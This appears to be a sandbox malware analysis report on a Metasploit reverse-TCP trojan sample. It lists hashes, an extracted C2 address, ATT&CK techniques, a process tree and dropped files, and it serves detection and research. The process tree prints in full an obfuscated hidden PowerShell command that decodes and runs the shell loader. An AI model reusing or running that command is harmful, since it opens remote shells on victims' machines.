metasploit | 33bc7520b5d44606327e9590686517c2de6c3bf9634cb2d6c8cc66b158211183

General

Target

JaffaCakes118_6626018fbed6bc365a383a18a88bb760.exe
Size

58KB
MD5

6626018fbed6bc365a383a18a88bb760
SHA1

191d0d6dd77e33dd45df742fa2f9c28c0740f837
SHA256

33bc7520b5d44606327e9590686517c2de6c3bf9634cb2d6c8cc66b158211183
SHA512

cb766841bc704807fee25a3e9a4c2ea9fde6c26a34d24402192cc28835306c757873cb53a24c9c2b2e86243510ec8e7508d24fc2f5b67ac45b6ab80528fbf690
SSDEEP

768:ez+VZ1p/ija+1I2UqBg6Q4sNbEMLF3pQ1d+NDwaTk02fxvIvri:HVZfqamsNbDFZQ1d+N8KkTvIO

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/shell_reverse_tcp

C2

192.168.25.164:666

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4000	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_6626018fbed6bc365a383a18a88bb760.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4000	powershell.exe
4000	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4000	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2420 wrote to memory of 4328	2420	JaffaCakes118_6626018fbed6bc365a383a18a88bb760.exe	84
PID 2420 wrote to memory of 4328	2420	JaffaCakes118_6626018fbed6bc365a383a18a88bb760.exe	84
PID 2420 wrote to memory of 4328	2420	JaffaCakes118_6626018fbed6bc365a383a18a88bb760.exe	84
PID 4328 wrote to memory of 4000	4328	cmd.exe	85
PID 4328 wrote to memory of 4000	4328	cmd.exe	85
PID 4328 wrote to memory of 4000	4328	cmd.exe	85
PID 4000 wrote to memory of 2940	4000	powershell.exe	86
PID 4000 wrote to memory of 2940	4000	powershell.exe	86
PID 4000 wrote to memory of 2940	4000	powershell.exe	86
PID 2940 wrote to memory of 4864	2940	csc.exe	87
PID 2940 wrote to memory of 4864	2940	csc.exe	87
PID 2940 wrote to memory of 4864	2940	csc.exe	87

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_6626018fbed6bc365a383a18a88bb760.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_6626018fbed6bc365a383a18a88bb760.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2420
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\40R08FJF.bat" "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_6626018fbed6bc365a383a18a88bb760.exe""
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4328
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVVNi+NGEL37VzRGB5uxhpZkfa0Z2E2WwEIIgRmSg/Gh1d3KiMiykeSNZzf579F741IyySXk0h/VXVWvXlV1B1Y9qPfLxf5j2346nk/9uFr+6vvOt0l879p2uT6o86VqG6uG0YzT5K/jdK4+deOPY69+avrxYtoPbXuyq5vst426NN2orrf55TZ/We/+t59ve29G//Q8TU78XG52P2/UX55vq7/5vkn+6f04fLb9+F98H/1x8OPq35bnqJbvF8FpIvKDc+HTy9mrcNKpfP/R103XjM2pU4FV4Q/m6NXy56ZL4qUKu2k3nI31ipLvLp3FzUGFZzMM43N/WQTXh+D07t0bkvVGXyOtMSWv01avd2r/zcvo94dDMCCj+urcdGLzaagMhngaSmw1V5C5chry7TTEGGoMaYFtBV2cVhHsQ1YkkMGdxr0EBymxZJAlb7YePrbwlsGUh7fIToOBrIQBXxE5vHnAgD2Heyl0UwKi8xpWYD7CKoWBHKY0UG0R5Rbbej5IS9GoYN7CUQXdLcxvYbTGKoeMBBaQlXaOAxoOceSAlhjBTF4oy2eGLA4cMDusihSnwGJpimExVAwZ2aWaFWgFQqhJkxNohJEDWkXzpI68pKJLhion+fUIJsaQZEJOWUkGSy+RZwQJyw4y7STeGEZdInRSt8CgsU1ISS6OaDSZ1RhCxoLz8ymQ+lSCjoCe5RgTLu65aOaApZJKRLaWQjKsXRywOstEch4xg1h56rJYYTSmFdaLllPWLhHETkolYwKMRJknQhPLjGSzP3jZM0pWNjDrXEqgJLuxxMs+0lBL4ChnCFiVcyPmOC1wL6sljdzGRAoZq3ibCCo3s5HBUW2lLHwm6FlSpKQixVArGAJkWS4+csj4FDBbGrpmLi6m0TIpCIZtz1KmKfpggBloquHcxlJwJII5KqDGfqMuyangw9OAFr80xQ6tKsm0KYUXS7IBKI4lg3RkEvHLGqIVksigDYBH8FtTw0odMB+kzhSSafa0YXOyuKyEX861kdbio5x7uoYPViyfQz4KEYCz6SIYyI0kjzLmnKlgktlv9MFirdkafIycUPKaZKjxKY0SgctH1c0PAHuQOSenbCE+acwR0+3nt4QPdwkS43q3qE+9WgXNg94FjQpbP20Ge/+9734Zn8NoPUnv7tbqK/6f2we4f/0BD6vgev90mjZJvFrfBc16oybVfdAcNipaq9/V6TKG3aVtd38sgi/8wd583xOWTXDdYMLP9TiafgwfW+/PKnz09tQ5hQ9O6z8B\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4000
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wzmv1kb4\wzmv1kb4.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2940
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES55A.tmp" "c:\Users\Admin\AppData\Local\Temp\wzmv1kb4\CSC7C96C75F95874928B1AB30FCC6171CE4.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\40R08FJF.bat

Filesize
3KB

MD5
239377b2e53b2db771827e0cafb26665

SHA1
f4a69ec16ab20be76181f88e197f3f67fb33d775

SHA256
cbb843c81f55095e5e156ceb7aac8176ba29c07cbf5a2131b2ab2d5f767b6c31

SHA512
128225dbf16edca2d007c831b0c484e12c9248c5b1a9e37e8c7e8af6d358fd259d1fe1b21473bfbbfcfdb3acc961e4962bf3a27fdf9bacac17fe2d9dd46df41a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES55A.tmp

Filesize
1KB

MD5
d966e62aadc1e606e88b563cb1502189

SHA1
b2f37732166ece78792740be11319d9e6344761a

SHA256
004d76d2a4e2a57433d3647a563c312426a15b5dbbd0d06288b8a75297dbb9ed

SHA512
e63441e55d607a0e66b1bfda5bb71ad38e83f029227ada4dd81e756635529d497dffbc35d5925a4f23c99beef9e33c7870fc0b7970e2885257aab66f19ee6204

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qrklkjnf.s2t.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\wzmv1kb4\wzmv1kb4.dll

Filesize
3KB

MD5
d54f1caeb30686557da95b3c0781c856

SHA1
36a84975f807525fb0d1e5322d3cfd900ec18041

SHA256
8256b9442e4b1341ba687b1c0c7d61849ab74e8bcdc382e87d147f87b50488f0

SHA512
a4fbad07e786310b12f7daff204aa032f77b545a0e68a6d3957d69f66b557507b95e8045a9a5e0e5c3a9a422eaad9d62bd04e558b26cf6a833fbb0e80660cf6b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wzmv1kb4\CSC7C96C75F95874928B1AB30FCC6171CE4.TMP

Filesize
652B

MD5
4b5d0e43610d5371e7f3ade9c1ebdb88

SHA1
453e5b40c6ef98d97c4f4987cb202f25027c6226

SHA256
4bf5fe577389fd887b88a1df241ed9c573358b3c84c41cabf81ba31883f60656

SHA512
493e7dc3b9d87d18cec1c1a2b5622fd293afcd2d66c8caaba6c407254017c7b003b625955b0e7a3aa107b409d408f279e893c02937e81624c234ec491d2a0dbb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wzmv1kb4\wzmv1kb4.0.cs

Filesize
444B

MD5
e4b9c8483e3e90ab7be541471cd6710c

SHA1
797367ac6d8426f10fa192a27a74e0bc9470b10e

SHA256
a1e90593aeaa26b367a39f2e22cd39ee012d67d831495554cb5c0ee64ef5a2e5

SHA512
02d35cd19a7e609a74ef298b8af2362e91b15ccf54a5cbbe23ec00c7119c2ead2e573c8ac0364e351dbb4450c961868e257299ed5852af16e32d8d4b35be0145

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wzmv1kb4\wzmv1kb4.cmdline

Filesize
369B

MD5
5c2e666befe5ccb585bab7a3a097e7bb

SHA1
a50b61b6a975833e6580a2a563e62dc5f0a4e78b

SHA256
864c8e9e2d91eb09b65efb94be6d5f635c208fc448c852f6110644118f0370e3

SHA512
4add84a6b69ce1cc9fb020316021cdf8a8fd9f3c67c7112159d7f4799526a348ac84ee5d5aa8c7131a65196aca3669d3c34068abe5933f1ecf9fd28bff1878fe

Download Submit
memory/2420-58-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/2420-43-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/4000-24-0x0000000006700000-0x000000000671A000-memory.dmp

Filesize
104KB

Download
memory/4000-37-0x00000000067A0000-0x00000000067A8000-memory.dmp

Filesize
32KB

Download
memory/4000-21-0x00000000061C0000-0x00000000061DE000-memory.dmp

Filesize
120KB

Download
memory/4000-22-0x0000000006200000-0x000000000624C000-memory.dmp

Filesize
304KB

Download
memory/4000-23-0x0000000007B10000-0x000000000818A000-memory.dmp

Filesize
6.5MB

Download
memory/4000-8-0x00000000059D0000-0x0000000005A36000-memory.dmp

Filesize
408KB

Download
memory/4000-9-0x0000000075300000-0x0000000075AB0000-memory.dmp

Filesize
7.7MB

Download
memory/4000-10-0x0000000005A40000-0x0000000005AA6000-memory.dmp

Filesize
408KB

Download
memory/4000-7-0x0000000005300000-0x0000000005322000-memory.dmp

Filesize
136KB

Download
memory/4000-6-0x0000000075300000-0x0000000075AB0000-memory.dmp

Filesize
7.7MB

Download
memory/4000-5-0x0000000005330000-0x0000000005958000-memory.dmp

Filesize
6.2MB

Download
memory/4000-20-0x0000000005BA0000-0x0000000005EF4000-memory.dmp

Filesize
3.3MB

Download
memory/4000-39-0x00000000067B0000-0x00000000067B1000-memory.dmp

Filesize
4KB

Download
memory/4000-40-0x0000000075300000-0x0000000075AB0000-memory.dmp

Filesize
7.7MB

Download
memory/4000-41-0x000000007530E000-0x000000007530F000-memory.dmp

Filesize
4KB

Download
memory/4000-42-0x0000000075300000-0x0000000075AB0000-memory.dmp

Filesize
7.7MB

Download
memory/4000-4-0x0000000002BE0000-0x0000000002C16000-memory.dmp

Filesize
216KB

Download
memory/4000-44-0x0000000075300000-0x0000000075AB0000-memory.dmp

Filesize
7.7MB

Download
memory/4000-56-0x00000000067B0000-0x00000000067B1000-memory.dmp

Filesize
4KB

Download
memory/4000-57-0x0000000075300000-0x0000000075AB0000-memory.dmp

Filesize
7.7MB

Download
memory/4000-3-0x000000007530E000-0x000000007530F000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads